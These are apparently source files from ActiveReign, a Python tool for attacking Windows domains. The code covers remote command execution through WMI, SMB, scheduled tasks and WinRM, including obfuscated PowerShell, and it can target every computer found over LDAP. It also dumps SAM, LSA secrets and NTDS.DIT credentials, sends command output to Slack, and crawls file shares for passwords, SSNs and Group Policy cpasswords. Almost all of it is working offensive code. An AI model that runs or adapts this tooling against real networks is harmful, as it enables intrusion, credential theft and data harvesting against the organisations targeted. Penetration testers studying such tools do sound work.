ps1exec.add_argument('-x', dest='execute', type=str, default='', help='Command to execute on remote server')
ps1exec.add_argument('-X', dest='ps_execute', type=str, default='', help='Execute command with PowerShell')
execution.add_argument('--force-ps32', dest='force_ps32', action='store_true',help='Run PowerShell command in a 32-bit process')
execution.add_argument('--no-obfs', dest='no_obfs', action='store_true', help='Do not obfuscate PowerShell commands')
execution.add_argument('--exec-method', dest='exec_method', choices=['wmiexec', 'smbexec','atexec', 'winrm'], default='wmiexec',help='Code execution method {wmiexec, smbexec, atexec, winrm}')
execution.add_argument('--exec-ip', dest='exec_ip', type=str, default='127.0.0.1', help='Set server used for code execution output')
execution.add_argument('--exec-share', dest='exec_share', type=str, default='C$',help='Set share used for code execution output')
execution.add_argument('--exec-path', dest='exec_path', type=str, default='\\Windows\\Temp\\', help='Set path used for code execution output')
execution.add_argument('--fileless', dest='fileless', action='store_true',help='Spawn SMB server for code execution output')
execution.add_argument('--fileless_sharename', dest='fileless_sharename', type=str, default='', help=argparse.SUPPRESS)
execution.add_argument('--no-output', dest='no_output', action='store_true', help='Execute command with no output')
execution.add_argument('--slack', dest='slack', action='store_true',help='Send execution output to Slack (Config required)')
target = enum_parser.add_argument_group("Target Options")
targets = target.add_mutually_exclusive_group(required=True)
targets.add_argument(dest='target', nargs='?', help='Positional argument, Accepts: target.txt, 127.0.0.0/24, ranges, 192.168.1.1')
targets.add_argument('--ldap', dest='ldap', action='store_true', help='Use LDAP to target all domain systems')
targets.add_argument('--eol', dest='eol', action='store_true', help='Use LDAP to target end-of-life systems on the domain')
target.add_argument('--ldap-srv', dest='ldap_srv', type=str, default='', help='Define LDAP server (Optional)')
def enum_arg_mods(args, db_obj, loggers):
logger = loggers['console']
context = argparse.Namespace(
mode = args.mode,
timeout = args.timeout,
local_auth = False,
debug = args.debug,
user = False,
passwd = False,
hash = False,
domain = False,
)
# Check for user creds in db, QoL addition
cred_id = db_obj.extract_credID(args.user, args.domain, args.passwd, args.hash)
if cred_id:
logger.status(['Credentials Saved', 'Next time try: -id {}'.format(str(cred_id))])
# ReDownload module resources
if args.module_reload:
logger.status('Reloading module resources...')
get_module_resources()
logger.status_success('Scripts updated at: {}'.format(os.path.join(os.path.expanduser('~'), '.ar3', 'scripts')))
exit(0)
# Ask user for creds if user present and no password
if not args.passwd and args.user and not args.hash:
args.passwd = getpass("Enter password, or continue with null-value: ")
# Cred ID present & no user/pass provided, for us in enumeration
elif args.cred_id and "-u" not in argv:
enum_user = db_obj.extract_user(args.cred_id)
args.user = enum_user[0][0]
args.passwd = enum_user[0][1]
args.hash = enum_user[0][2]
args.domain = enum_user[0][3]
# Gather target systems using ldap
if args.ldap or args.eol:
if args.cred_id:
ldap_user = db_obj.extract_user(args.cred_id)
context.user = ldap_user[0][0]
context.passwd = ldap_user[0][1]
context.hash = ldap_user[0][2]
context.domain = ldap_user[0][3]
elif args.domain and args.user:
context.user = args.user
context.passwd = args.passwd
context.hash = args.hash
context.domain = args.domain
else:
logger.warning("To use the LDAP feature, please select a valid credential ID or enter domain credentials")
logger.warning("Insert credentials:\n\tactivereign db insert -u username -p Password123 -d domain.local")
exit(0)
if context.hash:
logger.status(['LDAP Authentication', '{}\{} (Password: None) (Hash: True)'.format(context.domain, context.user)])
else:
logger.status(['LDAP Authentication', '{}\{} (Password: {}*******) (Hash: False)'.format(context.domain, context.user, context.passwd[:1])])
try:
l = LdapCon(context, loggers, args.ldap_srv, db_obj)
l.create_ldap_con()
if not l:
logger.status_fail(['LDAP Connection', 'Unable to create LDAP connection'])
exit(1)
logger.status_success(['LDAP Connection', 'Connection established (server: {}) (LDAPS: {})'.format(l.host, l.ldaps)])
if args.ldap:
args.target = list(l.computer_query(False, []).keys())
elif args.eol:
args.target = list(l.computer_query('eol', []).keys())
logger.status_success(['LDAP Connection','{} computers collected'.format(len(args.target))])
except Exception as e:
if "invalidCredentials" in str(e):
logger.fail(["LDAP Error", "Authentication failed"])
else:
logger.fail(["LDAP Error", str(e)])
exit(1)
else:
args.target = ipparser(args.target)
if "--threshold" not in argv:
tmp = db_obj.extract_lockout(args.domain)
if tmp:
args.lockout_threshold = tmp
logger.status(["Lockout Tracker", "Threshold extracted from database: {}".format(str(tmp))])
else:
logger.status(["Lockout Tracker", "Using default lockout threshold: {}".format(str(args.lockout_threshold))])
else:
db_obj.update_domain(args.domain, args.lockout_threshold)
logger.status(["Lockout Tracker", "Updating {} threshold in database to: {}".format(args.domain, str(args.lockout_threshold))])
if args.hash:
logger.status(['Enum Authentication', '{}\{} (Password: None) (Hash: True)'.format(args.domain, args.user)])
else:
logger.status(['Enum Authentication', '{}\{} (Password: {}****) (Hash: False)'.format(args.domain, args.user, args.passwd[:1])])
if 'l' in locals():
l.close()
return args | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/arg_parser.py | arg_parser.py |
from time import strftime, gmtime
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.dcerpc.v5 import transport, samr
from ar3.logger import highlight
def d2b(a):
tbin = []
while a:
tbin.append(a % 2)
a //= 2
t2bin = tbin[::-1]
if len(t2bin) != 8:
for x in range(6 - len(t2bin)):
t2bin.insert(0, 0)
return ''.join([str(g) for g in t2bin])
def convert(low, high, lockout=False):
time = ""
tmp = 0
if low == 0 and hex(high) == "-0x80000000":
return "Not Set"
if low == 0 and high == 0:
return "None"
if not lockout:
if (low != 0):
high = abs(high+1)
else:
high = abs(high)
low = abs(low)
tmp = low + (high)*16**8 # convert to 64bit int
tmp *= (1e-7) # convert to seconds
else:
tmp = abs(high) * (1e-7)
try:
minutes = int(strftime("%M", gmtime(tmp)))
hours = int(strftime("%H", gmtime(tmp)))
days = int(strftime("%j", gmtime(tmp)))-1
except:
return "[-] Invalid TIME"
if days > 1:
time += "{0} days ".format(days)
elif days == 1:
time += "{0} day ".format(days)
if hours > 1:
time += "{0} hours ".format(hours)
elif hours == 1:
time += "{0} hour ".format(hours)
if minutes > 1:
time += "{0} minutes ".format(minutes)
elif minutes == 1:
time += "{0} minute ".format(minutes)
return time
class SAMRDump:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:{}[\pipe\samr]', 139),
'445/SMB': (r'ncacn_np:{}[\pipe\samr]', 445),
}
def __init__(self, con, debug, logger):
self.logger = logger
self.debug = debug
self.threshold = 0
self._connection = con
self.__username = con.username
self.__password = con.password
self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
def dump(self, addr):
"""Dumps the list of users and shares registered present at
addr. Addr is a valid host name or IP address.
"""
# Try all requested protocols until one works.
for protocol in self.__protocols:
protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
rpctransport = transport.SMBTransport(addr, port, r'\samr',self.__username, self.__password)
try:
self.__fetchList(rpctransport)
except Exception as e:
self.logger.debug("PolEnum: Protocol failed: {0}".format(e))
else:
# Got a response. No need for further iterations.
self.__pretty_print()
break
def __fetchList(self, rpctransport):
dce = DCERPC_v5(rpctransport)
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
# Setup Connection
resp = samr.hSamrConnect2(dce)
if resp['ErrorCode'] != 0:
raise Exception('Connect error')
resp2 = samr.hSamrEnumerateDomainsInSamServer(
dce,
serverHandle=resp['ServerHandle'],
enumerationContext=0,
preferedMaximumLength=500)
if resp2['ErrorCode'] != 0:
raise Exception('Connect error')
resp3 = samr.hSamrLookupDomainInSamServer(
dce,
serverHandle=resp['ServerHandle'],
name=resp2['Buffer']['Buffer'][0]['Name'])
if resp3['ErrorCode'] != 0:
raise Exception('Connect error')
resp4 = samr.hSamrOpenDomain(dce, serverHandle=resp['ServerHandle'],
desiredAccess=samr.MAXIMUM_ALLOWED,
domainId=resp3['DomainId'])
if resp4['ErrorCode'] != 0:
raise Exception('Connect error')
self.__domains = resp2['Buffer']['Buffer']
domainHandle = resp4['DomainHandle']
# End Setup
domain_passwd = samr.DOMAIN_INFORMATION_CLASS.DomainPasswordInformation
re = samr.hSamrQueryInformationDomain2(
dce, domainHandle=domainHandle,
domainInformationClass=domain_passwd)
self.__min_pass_len = re['Buffer']['Password']['MinPasswordLength'] \
or "None"
pass_hist_len = re['Buffer']['Password']['PasswordHistoryLength']
self.__pass_hist_len = pass_hist_len or "None"
self.__max_pass_age = convert(
int(re['Buffer']['Password']['MaxPasswordAge']['LowPart']),
int(re['Buffer']['Password']['MaxPasswordAge']['HighPart']))
self.__min_pass_age = convert(
int(re['Buffer']['Password']['MinPasswordAge']['LowPart']),
int(re['Buffer']['Password']['MinPasswordAge']['HighPart']))
self.__pass_prop = d2b(re['Buffer']['Password']['PasswordProperties'])
domain_lockout = samr.DOMAIN_INFORMATION_CLASS.DomainLockoutInformation
re = samr.hSamrQueryInformationDomain2(
dce, domainHandle=domainHandle,
domainInformationClass=domain_lockout)
self.__rst_accnt_lock_counter = convert(
0,
re['Buffer']['Lockout']['LockoutObservationWindow'],
lockout=True)
self.__lock_accnt_dur = convert(
0,
re['Buffer']['Lockout']['LockoutDuration'],
lockout=True)
self.__accnt_lock_thres = re['Buffer']['Lockout']['LockoutThreshold'] \
or "None"
domain_logoff = samr.DOMAIN_INFORMATION_CLASS.DomainLogoffInformation
re = samr.hSamrQueryInformationDomain2(
dce, domainHandle=domainHandle,
domainInformationClass=domain_logoff)
self.__force_logoff_time = convert(
re['Buffer']['Logoff']['ForceLogoff']['LowPart'],
re['Buffer']['Logoff']['ForceLogoff']['HighPart'])
def __pretty_print(self):
PASSCOMPLEX = {
5: 'Domain Password Complex:',
4: 'Domain Password No Anon Change:',
3: 'Domain Password No Clear Change:',
2: 'Domain Password Lockout Admins:',
1: 'Domain Password Store Cleartext:',
0: 'Domain Refuse Password Change:'
}
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Minimum password length: {0}".format(self.__min_pass_len)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Password history length: {0}".format(self.__pass_hist_len)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Maximum password age: {0}".format(self.__max_pass_age)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Password Complexity Flags: {0}".format(self.__pass_prop or "None")])
for i, a in enumerate(self.__pass_prop):
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "\t{0} {1}".format(PASSCOMPLEX[i], str(a))])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Minimum password age: {0}".format(self.__min_pass_age)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Reset Account Lockout Counter: {0}".format(self.__rst_accnt_lock_counter)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Locked Account Duration: {0}".format(self.__lock_accnt_dur)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Account Lockout Threshold: {0}".format( self.__accnt_lock_thres)])
self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Forced Log off Time: {0}".format(self.__force_logoff_time)])
self.threshold = self.__accnt_lock_thres | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/polenum.py | polenum.py |
from os import _exit
from threading import Thread
from ar3.core.wmi import WmiCon
from ar3.core.rpc import RpcCon
from ar3.core.smb import SmbCon
from ar3.logger import highlight
from ar3.core.winrm import WINRM
from ar3.helpers import powershell
from ar3.core.wmiexec import WMIEXEC
from ar3.core.smbexec import SMBEXEC
from ar3.core.atexec import TSCHEXEC
from ar3.helpers.misc import slack_post
from ar3.ops.enum.polenum import SAMRDump
from ar3.ops.enum.share_finder import share_finder
from ar3.modules import get_module_class, populate_mod_args
from ar3.ops.enum.code_execution import ExecutionTimeout
def requires_admin(func):
def _decorator(con, *args, **kwargs):
if not con.admin:
return False
return func(con, *args, **kwargs)
return _decorator
def smb_login(args, loggers, host, db, lockout_obj, config_obj):
status = ''
smb = SmbCon(args, loggers, host, db)
if smb.smb_connection():
smb.host_info()
try:
smb.login()
if smb.admin:
status = "({})".format(highlight(config_obj.PWN3D_MSG, 'yellow'))
elif smb.auth and args.user:
status = "({})".format(highlight('Success', 'green'))
except Exception as e:
e = str(e).lower()
lockout_obj.failed_login(host, str(e).lower())
if "password_expired" in e:
status = "({})".format(highlight('Password_Expired', 'yellow'))
elif "logon_failure" in e:
lockout_obj.add_attempt()
status = "({})".format(highlight('Failed', 'red'))
elif "account_disabled" in e:
status = "({})".format(highlight('Account_Disabled', 'red'))
elif args.user:
status = "({})".format(highlight(e[:40], 'red'))
loggers['console'].info([smb.host, smb.ip, "ENUM", "{} {} ".format(smb.os, smb.os_arch), "(Domain: {})".format(smb.srvdomain),"(Signing: {})".format(str(smb.signing)), "(SMBv1: {})".format(str(smb.smbv1)), status])
return smb
else:
raise Exception('Connection to Server Failed')
def password_policy(con, args, db_obj, loggers):
ppol = SAMRDump(con, args.debug, loggers['console'])
ppol.dump(con.ip)
if ppol.threshold:
if ppol.threshold == "None":
loggers['console'].status('Lockout threshold: None, setting threshold to 99 in database for {}'.format(con.domain))
db_obj.update_domain(con.domain, 99)
else:
loggers['console'].status('Lockout threshold detected, setting threshold to {} in database for {}'.format(ppol.threshold, con.domain))
db_obj.update_domain(con.domain, ppol.threshold)
else:
raise Exception('Enumerating password policy failed')
@requires_admin
def code_execution(con, args, target, loggers, config_obj, payload, return_data=False):
# Implement Execution Method
if args.exec_method.lower() == 'wmiexec':
executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'smbexec':
executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'atexec':
executioner = TSCHEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
elif args.exec_method.lower() == 'winrm':
executioner = WINRM(loggers['console'], target, args, con, share_name=False)
# Log action to file
loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))
# Spawn thread for code execution timeout
timer = ExecutionTimeout(executioner, payload)
exe_thread = Thread(target=timer.execute)
exe_thread.start()
exe_thread.join(args.timeout+5)
exe_thread.running = False
# CMD Output
if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
# Return to module not print
if return_data:
return timer.result
for line in timer.result.splitlines():
loggers['console'].info([con.host, con.ip, args.exec_method.upper(), line])
@requires_admin
def ps_execution(con,args,target,loggers,config_obj):
try:
cmd = powershell.create_ps_command(args.ps_execute, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=con.os)
result = code_execution(con, args, target, loggers, config_obj, cmd, return_data=True)
for line in result.splitlines():
loggers['console'].info([con.host, con.ip, args.exec_method.upper(), line])
except Exception as e:
loggers['console'].debug([con.host, con.ip, args.exec_method.upper(), str(e)])
@requires_admin
def extract_lsa(con, args, target, loggers):
loggers[args.mode].info("Extract LSA\t{}\t{}\\{}".format(target, args.domain, args.user))
con.lsa()
@requires_admin
def extract_sam(con, args, target, loggers):
loggers[args.mode].info("Extract SAM\t{}\t{}\\{}".format(target, args.domain, args.user))
con.sam()
@requires_admin
def extract_ntds(con, args, target, loggers):
loggers[args.mode].info("Dumping NTDS.DIT\t{}\t{}\\{}".format(target, args.domain, args.user))
con.ntds()
@requires_admin
def loggedon_users(con, args, target, loggers):
x = RpcCon(args, loggers, target)
x.get_netloggedon()
for user, data in x.loggedon.items():
if data['logon_srv']:
loggers['console'].info([con.host, con.ip, "LOGGEDON", '{}\{:<25}'.format(data['domain'], user), "Logon_Server: {}".format(data['logon_srv'])])
else:
loggers['console'].info([con.host, con.ip, "LOGGEDON", '{}\{}'.format(data['domain'], user)])
def active_sessions(con, args, target, loggers):
x = RpcCon(args, loggers, target)
x.get_netsessions()
for user, data in x.sessions.items():
loggers['console'].info([con.host, con.ip, "SESSIONS", user, "Host: {}".format(data['host'])])
@requires_admin
def tasklist(con, args, loggers):
proc = WmiCon(args, loggers, con.ip, con.host)
proc.get_netprocess(tasklist=True)
@requires_admin
def list_services(con, args, loggers, target):
x = RpcCon(args, loggers, target)
for key,svc in x.list_services().items():
loggers['console'].info([con.host, con.ip, "SERVICES", "{:<25} {:<12} {}".format(svc['Name'], svc['Status'], svc['Display'])])
@requires_admin
def wmi_query(con, args, target, loggers):
q = WmiCon(args, loggers, con.ip, con.host)
loggers[args.mode].info("WMI Query\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, args.wmi_query))
q.wmi_query(args.wmi_namespace, args.wmi_query)
@requires_admin
def get_netlocalgroups(con, args, target, loggers):
q = WmiCon(args, loggers, con.ip, con.host)
loggers[args.mode].info("WMI Query\t{}\t{}\\{}\tEnumerate Local Groups".format(target, args.domain, args.user))
q.get_netlocalgroups()
@requires_admin
def localgroup_members(smb_obj, args, target, loggers):
q = WmiCon(args, loggers, smb_obj.ip, smb_obj.host)
loggers[args.mode].info("WMI Query\t{}\t{}\\{}\tEnumerate Local Groups".format(target, args.domain, args.user))
q.get_localgroup_members(smb_obj.con.getServerName(), args.local_members)
def execute_module(con, args, target, loggers, config_obj):
if args.exec_method.lower() == "winrm" and args.module != "test_execution":
loggers['console'].warning([con.host, con.ip, args.module.upper(), "WINRM Cannot be used for module execution outside of 'test_execution'"])
return
try:
module_class = get_module_class(args.module)
class_obj = module_class()
# Module Checks: Admin privs required and exec method used
if class_obj.requires_admin and not con.admin:
loggers['console'].fail([con.host, con.ip, args.module.upper(),"{} requires administrator access".format(args.module)])
return
elif class_obj.exec_methods and args.exec_method not in class_obj.exec_methods:
loggers['console'].fail([con.host, con.ip, args.module.upper(), "Current execution method ({}) not supported".format(args.exec_method)])
return
populate_mod_args(class_obj, args.module_args, loggers['console'])
loggers[args.mode].info("Module Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, args.module))
class_obj.run(target, args, con, loggers, config_obj)
except Exception as e:
loggers['console'].fail([con.host, con.ip, args.module.upper(), "Error: {}".format(str(e))])
def host_enum(target, args, lockout, config_obj, db_obj, loggers):
# @TODO refactor
try:
try:
con = smb_login(args, loggers, target, db_obj, lockout, config_obj)
except Exception as e:
loggers['console'].debug([target, target, "ENUM", highlight(str(e), 'red')])
return []
shares = []
if con.auth:
# Sharefinder
if args.share:
shares = args.share.split(",")
for share in shares:
loggers['console'].info([con.host, con.ip, "SHAREFINDER", "\\\\{}\\{}".format(con.host, share)])
elif args.sharefinder or args.spider:
shares = share_finder(con, args, loggers, target)
# Secondary actions
if args.passpol:
password_policy(con, args, db_obj, loggers)
if args.sam:
extract_sam(con, args, target, loggers)
if args.lsa:
extract_lsa(con, args, target, loggers)
if args.ntds:
extract_ntds(con, args, target, loggers)
if args.loggedon:
loggedon_users(con, args, target, loggers)
if args.sessions:
active_sessions(con, args, target, loggers)
if args.list_processes:
tasklist(con, args, loggers)
if args.list_services:
list_services(con, args, loggers, target)
if args.local_groups:
get_netlocalgroups(con, args, target, loggers)
if args.local_members:
localgroup_members(con, args, target, loggers)
if args.wmi_query:
wmi_query(con, args, target, loggers)
if args.execute:
code_execution(con, args, target, loggers, config_obj, args.execute)
if args.ps_execute:
ps_execution(con, args, target, loggers, config_obj)
if args.module:
execute_module(con, args, target, loggers, config_obj)
loggers['console'].debug("Shares returned for: {} {}".format(target, shares))
return shares
except KeyboardInterrupt:
_exit(0)
except Exception as e:
loggers['console'].debug(str(e))
finally:
try:
con.con.logoff()
except:
pass
try:
con.close()
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/host_enum.py | host_enum.py |
import os
import threading
from sys import exit
from time import sleep
from threading import Thread
from ar3.servers.smb import SMBServer
from ar3.ops.enum.spider import spider
from ar3.servers.http import ar3_server
from ar3.ops.enum.host_enum import host_enum
from ar3.helpers.misc import gen_random_string
from ar3.ops.enum.lockout_tracker import LockoutTracker
def requires_smb_server(func):
def _decorator(options, *args, **kwargs):
if options.fileless:
return func(options, *args, **kwargs)
return False
return _decorator
def requires_http_server(func):
def _decorator(options, *args, **kwargs):
if options.fileless:
return func(options, *args, **kwargs)
return False
return _decorator
@requires_smb_server
def smb_server_setup(options, logger):
logger.debug('Starting AR3 SMB Server')
setattr(options, 'fileless_sharename', '{}$'.format(gen_random_string(7)))
smb_srv_obj = SMBServer(logger, options.fileless_sharename)
smb_srv_obj.start()
return smb_srv_obj
@requires_http_server
def http_server_setup(options, logger):
logger.debug('Starting AR3 HTTP Server')
t = Thread(target=ar3_server, args=(logger,))
t.start()
def thread_launcher(target, args, lockout_obj, config_obj, db_obj, loggers):
shares = host_enum(target, args, lockout_obj, config_obj, db_obj, loggers)
if args.spider:
for share in shares:
if share not in config_obj.BLACKLIST_SHARE or args.share == share:
spider(args, config_obj, loggers, db_obj, target, share)
def main(args, config_obj, db_obj, loggers):
lockout_obj = LockoutTracker(args, loggers)
servers = { 'smb' : smb_server_setup(args, loggers['console']),
'http' : http_server_setup(args, loggers['console'])
}
active_threads = []
for target in args.target:
try:
t = threading.Thread(target=thread_launcher, args=(target, args, lockout_obj, config_obj, db_obj, loggers,))
t.daemon = True
t.start()
active_threads.append(t)
while threading.activeCount() > args.max_threads:
sleep(0.001)
for t in active_threads:
if not t.isAlive():
active_threads.remove(t)
except KeyboardInterrupt:
print("\n[!] Key Event Detected, Closing...")
exit(0)
except Exception as e:
loggers['console'].debug(args.debug, "Enum-Main: {}".format(str(e)))
# Cleanup & Close
while len(active_threads) > 0:
for t in active_threads:
if not t.isAlive():
active_threads.remove(t)
sleep(0.01)
for server,obj in servers.items():
if obj:
obj.cleanup_server()
os._exit(0) # Only realy way ive found to shutdown server | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/__init__.py | __init__.py |
import threading
from ar3.core.smb import SmbCon
class SearchThread(threading.Thread):
''' Recursively scan directories, adding
files to queue to be parsed for data'''
def __init__(self, args, config, loggers, db, target, share):
threading.Thread.__init__(self)
self.file_queue = []
self.timeout = args.timeout
self.target = target
self.share = share
self.max_depth = args.max_depth
self.start_path = args.start_path
self.whitelist_ext = config.WHITELIST_EXT
self.blacklist_dir = config.BLACKLIST_DIR
self.loggers = loggers
self.smbcon = SmbCon(args, loggers, target, db)
self.smbcon.create_smb_con()
# Show kickoff messages on startup, if not args.spider startup is called from a module
if args.spider:
loggers['console'].info([self.smbcon.host, self.smbcon.ip, "SPIDER", "Scanning \\\\{}\\{}{}".format(target, share, args.start_path.replace("/", "\\"))])
loggers['spider'].info("Spider\t\\\\{}\\{}{}".format(target, share, args.start_path.replace("/", "\\")))
def run(self):
self.recursion(self.start_path)
self.smbcon.close()
del self.smbcon
def recursion(self, path):
try:
for x in self.smbcon.list_path(self.share, path+"*"):
#encoding depending on SMBv1 con or not
try:
filename = x.get_longname().decode('UTF-8')
except:
filename = x.get_longname()
# Quick fix for gpp passwords on 2019 DC's @TODO create perm fix
if filename.lower() == "groups":
filename = "Groups.xml"
if filename not in ['.','..']:
# If DIR, use recursion to keep searching until max depth hit
if x.is_directory() and path.count("/") <= self.max_depth:
full_path = path + filename + "/"
# Verify not on blacklist
if full_path not in self.blacklist_dir:
self.loggers['console'].debug("Spider-DIR: {}".format(full_path))
self.recursion(full_path)
# Check for valid file ext before adding to queue
elif filename.split('.')[-1].lower() in self.whitelist_ext:
#else add to file queue to be scanned
tmp = {
'ip' : self.smbcon.ip,
'host' : self.smbcon.host,
'share' : self.share,
'path' : path,
'filename' : filename
}
self.loggers['console'].debug("Spider-File: {}".format(tmp['filename']))
self.file_queue.append(tmp)
del tmp
except:
pass | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/spider/file_search.py | file_search.py |
import threading
from os import _exit
from time import sleep
from datetime import datetime, timedelta
from ar3.ops.enum.file_parser import ParserThread
from ar3.ops.enum.spider.file_search import SearchThread
def spider(args, config_obj, loggers, db_obj, target, share):
''' Launches SearchThread to scan system directories for any file
outside the config files black list parameters. Then the ParseThread
is launched to parse files and ID potentially sensitive information'''
search_thread = SearchThread(args, config_obj, loggers, db_obj, target, share)
search_thread.daemon = True
search_thread.start()
sleep(args.timeout)
# Launch ParserThread class to discovery data in files
active_threads = []
while search_thread.file_queue:
try:
d = {}
d['start_time'] = datetime.now()
d['thread'] = ParserThread(config_obj, db_obj, args, loggers, search_thread.file_queue[0])
d['thread'].daemon = True
d['thread'].start()
search_thread.file_queue.pop(0)
active_threads.append(d)
# Check for thread timeout in search threads and send stop signal
for th in reversed(active_threads):
if th['thread'].isAlive() and datetime.now() > th['start_time'] + timedelta(seconds=config_obj.PARSE_TIMEOUT):
th['thread'].stop()
active_threads.remove(th)
# Wait while max threads are active or SearchThread is still active
while threading.activeCount() >= args.max_threads or search_thread.isAlive():
# break if there are new file to parse
if search_thread.file_queue and threading.activeCount() < args.max_threads:
break
sleep(0.05)
except KeyboardInterrupt:
print("\n[!] Key Event Detected, Closing...")
_exit(0)
except Exception as e:
loggers['console'].debug("\\\\{}\\{}\\\tFile_Search:{}".format(target, share, str(e)))
# Wait for threads to close and cleanup after each share
while threading.activeCount() > 2:
for th in reversed(active_threads):
if th['thread'].isAlive() and datetime.now() > th['start_time'] + timedelta(seconds=config_obj.PARSE_TIMEOUT):
th['thread'].stop()
active_threads.remove(th)
sleep(0.05)
del active_threads
del search_thread
return | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/enum/spider/__init__.py | __init__.py |
import threading
from impacket.smb3structs import FILE_READ_DATA
from ar3.core.smb import SmbCon
from ar3.pysmb.smb import smb_connect
from ar3.helpers.remotefile import RemoteFile
from ar3.ops.enum.file_parser.parse_docx import parse_docx
from ar3.ops.enum.file_parser.parse_xlsx import parse_xlsx
from ar3.ops.enum.file_parser.parse_regex import parse_data
class ParserThread(threading.Thread):
'''Parse file contents, on valid match returns dict:
{
'Parser': 'Regex',
'ParserDetails': 'SSN',
'LineCount': '39',
'LineSample': 'SSN:xxx-xx-xxxx'
}'''
def __init__(self, config, db, args, loggers, file_data):
threading.Thread.__init__(self)
# Create SMB connection to parse file
self.args = args
self.loggers = loggers
self.db = db
self.logger = loggers['console']
self.filer = loggers['spider']
self.debug = args.debug
self.timeout = args.timeout
self._running = True
self.user = args.user
self.passwd = args.passwd
self.hash = args.hash
self.domain = args.domain
self.local_auth = args.local_auth
# Unpack data from search_thread queue
self.ip = file_data['ip']
self.host = file_data['host']
self.share = file_data['share']
self.path = file_data['path']
self.filename = file_data['filename']
# Unpack configs
self.filename_only = args.filename_only
self.regex = config.REGEX
self.keywords = config.KEY_WORDS
self.ext = config.KEY_EXT
self.xlsx_keywords = config.XLSX_HEADERS
self.max_size = config.MAX_CHAR
self.max_chars = config.MAX_FILE_SIZE
self.logger.debug("ParserThread Init: \\\\{}\\{}{}{}".format(self.ip, self.share, self.path.replace("/", "\\"), self.filename))
def run(self):
try:
self.parse(self.ip, self.share, self.path, self.filename)
return
except Exception as e:
self.logger.debug("ParserThread Err: \\\\{}\\{}{}{}\tFileParser:{}".format(self.ip, self.share, self.path.replace("/", "\\"), self.filename, str(e)))
def stop(self):
self._running = False
def parse(self, server, share, path, filename):
while self._running:
# File Extension
ext = file_extension(filename)
if ext in self.ext:
self.reporter('Extension', ext,'', '')
return
# Key Word in filename
keyword = self.keyword_search(filename)
if keyword in self.keywords:
self.reporter('Keyword', keyword, '', '')
return
# Parse File Contents
if not self.filename_only:
## Parse Excel (Uses pysmb, not hash auth)
if ext == 'xlsx' and not self.hash:
# Create SMB connection using pysmb
con = smb_connect(server, self.user, self.passwd, self.domain, self.timeout)
result = parse_xlsx(self.xlsx_keywords, self.regex, self.max_size, self.max_chars, self.timeout, con, share, path, filename)
if result:
self.reporter(result['Parser'], result['ParserDetails'], result['LineCount'], result['LineSample'])
con.close()
return
con.close()
## Parse Word Docs (Uses pysmb, not hash auth)
elif ext == 'docx' and not self.hash:
# Create SMB connection using pysmb
con = smb_connect(server, self.user, self.passwd, self.domain, self.timeout)
result = parse_docx(self.regex, self.max_chars, self.max_size, self.timeout, con, share, path, filename)
if result:
self.reporter(result['Parser'], result['ParserDetails'], result['LineCount'], result['LineSample'])
con.close()
return
con.close()
## Parse All other file types
else:
# Create SMB connection using Impacket
smb_obj = SmbCon(self.args, self.loggers, server, self.db)
smb_obj.create_smb_con()
try:
reader = RemoteFile(smb_obj.con, path + filename, share, access=FILE_READ_DATA)
reader.open()
contents = reader.read(self.max_size)
except:
self.logger.debug("Failed to open file: {}".format(path + filename))
return
# Pass Contents to parser
result = parse_data(contents, self.regex, self.max_chars, filename)
if result:
self.reporter(result['Parser'], result['ParserDetails'], result['LineCount'], result['LineSample'])
# Close open reader object
reader.close()
del (reader)
smb_obj.close()
return
def keyword_search(self, filename):
#Search for keywords in filename
for word in self.keywords:
if word in filename.lower():
return word
return False
def reporter(self, search, search_detail, line_num, line_detail):
full_path = "\\\\" + self.host + "\\" + self.share + self.path.replace("/", "\\") + self.filename
# Used for gpp_password module & decryption:
if search_detail == 'gpp_password':
from ar3.modules.gpp_password import cpassword_parser
cpassword_parser(self.loggers, self.host, self.ip, full_path, line_detail)
# Write spider results to terminal and log
else:
self.filer.info("Spider\t{}\t{}\t{}".format(search, full_path, line_detail))
line = "{:<10} : {}".format(search, full_path)
if line_num:
line += " (Line: {})".format(line_num)
self.logger.success([self.host, self.ip, "SPIDER", line])
if line_detail:
self.logger.success([self.host, self.ip, "SPIDER", "{:<10} : {}".format("Details", line_detail.strip())])
def file_extension(filename):
try:
return filename.split('.')[-1].lower()
except:
